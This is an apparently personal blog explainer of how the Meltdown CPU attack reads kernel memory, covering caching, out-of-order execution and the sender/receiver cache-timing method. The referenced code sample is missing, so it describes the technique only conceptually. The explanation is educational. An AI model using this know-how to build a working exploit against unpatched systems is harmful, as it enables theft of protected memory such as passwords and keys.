I just read the white paper on the “Meltdown” CPU security bug because I was curious about what exactly was going on here. The whitepaper explains it in detail but it’s fairly long and academic so I thought a simpler overview was in order.
The Meltdown attack is a cunning way of bypassing the security checks of many modern CPUs and allows reading kernel mode memory from any process on un-patched operating systems.
This article is about how it actually works — you can read more about the implications of these vulnerabilities at the Meltdown site and elsewhere.
Firstly, to call this a “bug” (as many are) is a probably over-stating it a little — the CPU functions as advertised. The problem is that someone figured out how to read the side effects caused by operations that should otherwise have been prevented.
What follows is a little technical but I’ll try to explain it as simply as possible. Certainly I’ve glossed over the details — the point here is just to convey conceptually how it works.
Before getting to the actual cause of the problem though there’s a couple of prerequisites you’ll need to understand.
The CPU cache is a block of memory on the CPU that stores recently accessed pages of data. Because these pages are cached directly on the CPU access to them is faster than having to go all the way back to main memory.
When the CPU reads from main memory it caches a copy of that page in the CPU cache. Next time it needs to read from main memory if the page is cached, it can load the value from the much faster on-CPU cache.
Each page in the cache is 4096 bytes and the cache is big enough to store many of these pages (depending on the CPU)
Each CPU core has multiple execution units, each capable of executing different types of operations.
eg: an Intel i7 has between 17 and 20 execution units — 2x integer arthimetic, 1x divide, 1x load memory, 1x store memory unit etc…
In order to keep these units as busy as possible the CPU will look ahead at upcoming instructions and start executing them on different execution units while waiting for the current instruction to complete.
(That’s a grossly over-simplified view but sufficient for this discussion. In practice, instructions are broken down into micro-ops which are dispatched to execution units).
At any point in time the CPU is operating in either priveledged mode or non-priveledged mode.
Basically the operating system runs in priveledged mode and installed programs run in non-priveledged mode.
If you think about the above it appears that user mode (non-priveledged) code shouldn’t be able to read kernel mode memory because the CPU will throw an exception.
The problem is that:
Firstly the attacker allocates a block of memory consisting of 256 pages of memory (ie: 256 * 4096 bytes). Each page in this block of memory won’t be cached at this point because it has never been accessed.
Next, a sequence of code similar to the following is executed. This is called the “sender”:
Assuming the CPU starts out-of-order execution of instructions 2–4 before instruction 1 completes then instruction 4 will cause one page of the allocated block of memory to be cached on the CPU. The page that is cached will be directly related to the byte read from kernel mode memory. eg: if the secret is 21 then the 21st page of the allocated memory block will now be cached on the CPU.
Finally, the “receiver” observes the side effects of this out-of-order execution to determine the secret byte that was read.
Continuing the example from above, pages 0 through 20 of the allocated memory block would be slow to read, but page 21 would be considerably faster — so the secret value must be 21.
Now just repeat everything above for as many secret bytes as you want to read. The white paper says they were able to read up to about 500Kb/second.